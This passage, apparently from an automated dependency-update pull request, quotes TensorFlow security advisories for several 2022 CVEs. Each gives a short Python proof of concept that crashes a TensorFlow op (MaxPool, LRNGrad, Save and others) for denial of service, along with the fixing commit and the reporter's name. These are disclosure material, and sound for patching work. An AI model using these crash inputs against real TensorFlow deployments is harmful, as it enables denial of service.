indices = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int64, seed=-1288)
values = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int32, seed=-9366)
dense_shape = tf.random.uniform(shape=[0], minval=-10000, maxval=10000, dtype=tf.int64, seed=-9878)
size = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int32, seed=-10000)
weights = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.float32, seed=-10000)
tf.raw_ops.SparseBincount(indices=indices, values=values, dense_shape=dense_shape, size=size, weights=weights, binary_output=binary_output)

Patches

We have patched the issue in GitHub commit 40adbe4dd15b582b0210dfbf40c243a62f5119fa.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Di Jin, Secure Systems Labs, Brown University

CVE-2022-35989

Impact

When MaxPool receives a window size input array ksize with dimensions greater than its input tensor input, the GPU kernel gives a CHECK fail that can be used to trigger a denial of service attack.

import tensorflow as tf
import numpy as np

input = np.ones([1, 1, 1, 1])
ksize = [1, 1, 2, 2]
strides = [1, 1, 1, 1]
padding = 'VALID'
data_format = 'NCHW'

tf.raw_ops.MaxPool(input=input, ksize=ksize, strides=strides, padding=padding, data_format=data_format)

Patches

We have patched the issue in GitHub commit 32d7bd3defd134f21a4e344c8dfd40099aaf6b18.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Jingyi Shi.

CVE-2022-35988

Impact

When tf.linalg.matrix_rank receives an empty input a, the GPU kernel gives a CHECK fail that can be used to trigger a denial of service attack.

import tensorflow as tf

a = tf.constant([], shape=[0, 1, 1], dtype=tf.float32)
tf.linalg.matrix_rank(a=a)

Patches

We have patched the issue in GitHub commit c55b476aa0e0bd4ee99d0f3ad18d9d706cd1260a.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Kang Hong Jin.

CVE-2022-35985

Impact

If LRNGrad is given an output_image input tensor that is not 4-D, it results in a CHECK fail that can be used to trigger a denial of service attack.

import tensorflow as tf
depth_radius = 1
bias = 1.59018219
alpha = 0.117728651
beta = 0.404427052
input_grads = tf.random.uniform(shape=[4, 4, 4, 4], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2033)
input_image = tf.random.uniform(shape=[4, 4, 4, 4], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2033)
output_image = tf.random.uniform(shape=[4, 4, 4, 4, 4, 4], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2033)
tf.raw_ops.LRNGrad(input_grads=input_grads, input_image=input_image, output_image=output_image, depth_radius=depth_radius, bias=bias, alpha=alpha, beta=beta)

Patches

We have patched the issue in GitHub commit bd90b3efab4ec958b228cd7cfe9125be1c0cf255.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Di Jin, Secure Systems Labs, Brown University

CVE-2022-35984

Impact

ParameterizedTruncatedNormal assumes shape is of type int32. A valid shape of type int64 results in a mismatched type CHECK fail that can be used to trigger a denial of service attack.

import tensorflow as tf
seed = 1618
seed2 = 0
shape = tf.random.uniform(shape=[3], minval=-10000, maxval=10000, dtype=tf.int64, seed=4894)
means = tf.random.uniform(shape=[3, 3, 3], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2971)
stdevs = tf.random.uniform(shape=[3, 3, 3], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2971)
minvals = tf.random.uniform(shape=[3, 3, 3], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2971)
maxvals = tf.random.uniform(shape=[3, 3, 3], minval=-10000, maxval=10000, dtype=tf.float32, seed=-2971)
tf.raw_ops.ParameterizedTruncatedNormal(shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals, seed=seed, seed2=seed2)

Patches

We have patched the issue in GitHub commit 72180be03447a10810edca700cbc9af690dfeb51.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Di Jin, Secure Systems Labs, Brown University

CVE-2022-35983

Impact

If Save or SaveSlices is run over tensors of an unsupported dtype, it results in a CHECK fail that can be used to trigger a denial of service attack.

import tensorflow as tf
filename = tf.constant("")
tensor_names = tf.constant("")

# Save
data = tf.cast(tf.random.uniform(shape=[1], minval=-10000, maxval=10000, dtype=tf.int64, seed=-2021), tf.uint64)
tf.raw_ops.Save(filename=filename, tensor_names=tensor_names, data=data, )

# SaveSlices
shapes_and_slices = tf.constant("")
data = tf.cast(tf.random.uniform(shape=[1], minval=-10000, maxval=10000, dtype=tf.int64, seed=9712), tf.uint32)
tf.raw_ops.SaveSlices(filename=filename, tensor_names=tensor_names, shapes_and_slices=shapes_and_slices, data=data, )

Patches

We have patched the issue in GitHub commit 5dd7b86b84a864b834c6fa3d7f9f51c87efa99d4.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Di Jin, Secure Systems Labs, Brown University

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Berlin, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

[ ] <!-- rebase-ch

technologiestiftung / maps-latent-space